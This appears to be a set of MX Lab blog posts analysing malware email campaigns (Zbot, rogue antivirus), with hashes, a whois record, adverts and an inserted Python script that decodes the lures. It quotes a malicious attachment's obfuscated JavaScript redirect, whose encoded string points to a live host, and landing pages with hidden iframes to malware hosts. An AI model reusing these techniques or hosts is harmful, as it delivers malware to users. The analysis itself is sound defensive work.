Email “Your document” contains trojan Trojan-Spy.Zbot


MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Your document”, sent from spoofed addresses, with the following very short body:

To view your document, please open attachment.

The attached ZIP file has the name document_8608003.pdf.zip and contains the 196 kB large file c3.exe.

The trojan is known as Trojan-Spy.Zbot, W32/Risk.QSAW-8224, Luhe.Fiha.A or PE:Malware.FakePDF@CV!1.9C3A.

At the time of writing, 5 of the 54 AV engines detected the trojan at Virus Total.

Use the Virus Total permalink for more detailed information.
SHA256: b7e768d540e63e06139dc2dd194dda47b3a2712cb27b1d173127a7801ac88e88

Resume emails with attached file Resume.html lead to rogue AV software


MX Lab intercepts emails with the subject Resume, an attached file Resume.html and a very short email body:

Attached, please find

The attached HTML file contains the following code:

<SCRIPT LANGUAGE="Javascript"><!--
//
function xhtmldecode(x){
document.write(unescape(x))
}
function runit(){
x="%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A"
xhtmldecode(x)
}
runit()
//-->
</script>

When opening the attached HTML file you are directed to a web site with the following code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>

After 4 seconds you are redirected to hxxp://brocuphdislock.cz.cc/scanner10/?afid=24. On our Mac computer we got the following screen.

It stayed like this for quite a while, so I guess the scripting of this site doesn’t work too well on a Mac computer. At MX Lab, we believe that this is a new campaign to distribute the rogue anti virus software antivirus_24.exe, as mentioned in earlier blog articles:

Campaign with emails that lead to rogue AV software antivirus_24.exe continues
Malicious emails lead to rogue AV software antivirus_24.exe

Malicious emails lead to rogue AV software antivirus_24.exe


MX Lab intercepted emails that lead to the rogue anti virus software with the executable antivirus_24.exe. The senders make use of well known brand names like Macy’s, Costco Photo Center and perhaps other brands as well.

The URLs inside the message lead to a web site that hosts a malicious script and will offer you the option to download antivirus_24.exe later on.

When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.

The web site has the following HTML code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head><body>

<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>

</body></html>
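As an added defensive example (not MX Lab's code), the following Python script reproduces the decode step an analyst would take for both the Resume.html attachment quoted above and the landing pages in these two posts: it percent-decodes the string literal handed to unescape() (what document.write injects), then lists meta-refresh targets and hidden or 1x1 iframe sources. Both samples are constructed from the HTML quoted on this page, with the landing-page URLs kept defanged (hxxp) as the posts show them.

```python
import re
from urllib.parse import unquote

# Constructed sample: the Resume.html attachment from the post, with the
# percent-encoded payload copied as quoted on the page.
RESUME_HTML = '''<SCRIPT LANGUAGE="Javascript"><!--
function xhtmldecode(x){ document.write(unescape(x)) }
function runit(){
x="%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A"
xhtmldecode(x)
}
runit()
//--></script>'''

# Constructed sample: the landing page from the post (URLs kept defanged as hxxp).
LANDING_HTML = '''PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24">
</head><body>
<iframe src="hxxp://cherrysolo.ru:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>'''

# A quoted JS string literal containing at least four %XX escapes in a row.
PERCENT_STRING = re.compile(r'"([^"]*(?:%[0-9A-Fa-f]{2}){4,}[^"]*)"')
META_REFRESH = re.compile(
    r'<meta\s+http-equiv="refresh"\s+content="\s*(\d+)\s*;\s*url=([^"]+)"', re.I | re.S)
IFRAME = re.compile(r'<iframe\s+([^>]*)>', re.I | re.S)


def decode_js_layers(html: str) -> str:
    """Return the HTML plus each percent-encoded literal decoded (what unescape() injects)."""
    layers = [html]
    for match in PERCENT_STRING.finditer(html):
        layers.append(unquote(match.group(1)))
    return "\n".join(layers)


def extract_redirects(html: str) -> dict:
    """List meta-refresh targets and hidden (invisible or 1x1) iframe sources."""
    text = decode_js_layers(html)
    refresh = [(int(delay), url.strip()) for delay, url in META_REFRESH.findall(text)]
    hidden = []
    for attrs in IFRAME.findall(text):
        src = re.search(r'src="([^"]+)"', attrs, re.I)
        style = re.search(r'style="([^"]*)"', attrs, re.I)
        dims = [int(v) for v in re.findall(r'(?:height|width)="(\d+)"', attrs, re.I)]
        invisible = bool(style and "hidden" in style.group(1).lower()) or any(d <= 1 for d in dims)
        if src and invisible:
            hidden.append(src.group(1))
    return {"meta_refresh": refresh, "hidden_iframes": hidden}
```

Running extract_redirects() over a suspicious HTML attachment surfaces the redirect chain without rendering it in a browser, which is the check a mail gateway or analyst wants before anything is opened.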

We got the screen shown below, but on Windows it will look slightly different: icons for your hard drives and other Windows elements will be included.

You are then shown a series of errors claiming your system is infected, and the instructions lead you to download the malware. This part is obviously fake, so please do not continue the process.

Virus Total permalink and MD5: 5be4b708a68687cb5490fe2caea49c82

MX Lab Summer Sales, only €8 per mailbox per year!


MX Lab is offering the Zero Hour Anti Virus and Managed Anti Spam for your mail server for € 8 per mailbox per year. For more information visit http://www.mxlab.eu/ and contact us.

Rogue online anti virus scanner Antivirus Plus


Antivirus Plus is a rogue anti virus scanner. When visiting a URL like hxxp://myreallyty.com/su/in.cgi?18 (something I don’t recommend doing at home), an online virus scanner starts to check your computer system. It won’t take long before the first viruses, malware and trojans are detected.

The online virus scanner warns you that you have several infections, with I-Worm.Sobig, TrojanDropper.JS.Mimail and Backdoor.SdBot.gen among the most critical according to Antivirus Plus.


Antivirus Plus soon warns you that it can’t clean your computer and offers you the option to download additional software to do so.

The file Installer_70137.exe is downloaded and is known as:

Win32:Trojan-gen (Avast)
Trojan.Win32.Agent2.gnf (F-Prot, Kaspersky)
TrojanDownloader:Win32/Renos.BAO (Microsoft)
Troj/FakeAV-NT (Sophos)

Virus Total permalink and MD5: 916e0f7aef7f1ea6308fa886d41ed750.

Rogue anti virus program: Antivirus for Windows – New 2009 Version


MX Lab intercepted a message that caught our attention. Some time ago, a rogue anti virus/anti spyware program known as Antivirus 2009, XP Antivirus Protection, MSAntivirus 2008 and Vista Antivirus 2008 was promoted on the internet and in various spam emails.

It seems that this now is distributed under a new name “Antivirus for Windows – New 2009 Version”.

The email was sent from PC Protection <internet.clientservice@gmail.com> and contains the subject “Update your Antivirus for Windows”.

The email looks like a mailing and contains Unsubscribe, Forward and Update Profile links. However, when looking at all the links in the message, some are invalid, like the Report Abuse link that points to http://ss25..sourcecompmail.com/ (note the double dot after ss25). The domains http://ss25.sourcecompmail.com/ and http://sourcecompmail.com/ return an HTTP 404 error and host no web site. It is very common for such campaigns to work from a subdomain and pages under it without any root HTML page.

The domain itself appears to be registered at Tucows with the following details:

[whois.tucows.com]
Registrant:
 Quattro Web Solutions
 13 Hares avenue
 Woodstock
 Cape Town,  7925
 ZA

 Domain name: SOURCECOMPMAIL.COM

 Administrative Contact:
    Honig, Paul  paul@quattro.co.za
    15 Wandel street
    Gardens
    Cape Town
    Cape Town,  7925
    ZA
    +27.4480099    Fax: +27.214619277

 Technical Contact:
    Desk, Help  domreg@ns.com
    322 South Marietta Street
    ww
    w
    Gastonia, WI 28052
    US
    +1.7048527000    Fax: +1.7048849011

 Registrar of Record: TUCOWS, INC.
 Record last updated on 28-Oct-2008.
 Record expires on 28-Oct-2009.
 Record created on 28-Oct-2008.

 Registrar Domain Name Help Center:

http://domainhelp.tucows.com

 Domain servers in listed order:
    NS3.NITRIC.CO.ZA
    NS2.NITRIC.CO.ZA   

 Domain status: clientTransferProhibited
                clientUpdateProhibited

When following the download links, a landing page is shown:

When filling in your email address and the activation code you are presented with a payment screen.

Recommendation: do not proceed with the payment process and do not download the program.

MX Lab includes MX Lab Email Archiving & Backup service as a standard


MX Lab will offer the optional service MX Lab Email Archiving & Backup for free for each account on MX Lab AVAS Gateway or MX Lab Hosted Mail solution. This service will become available early March 2009 and the retention period for archived and stored emails will be 60 days.

Read the full press release.
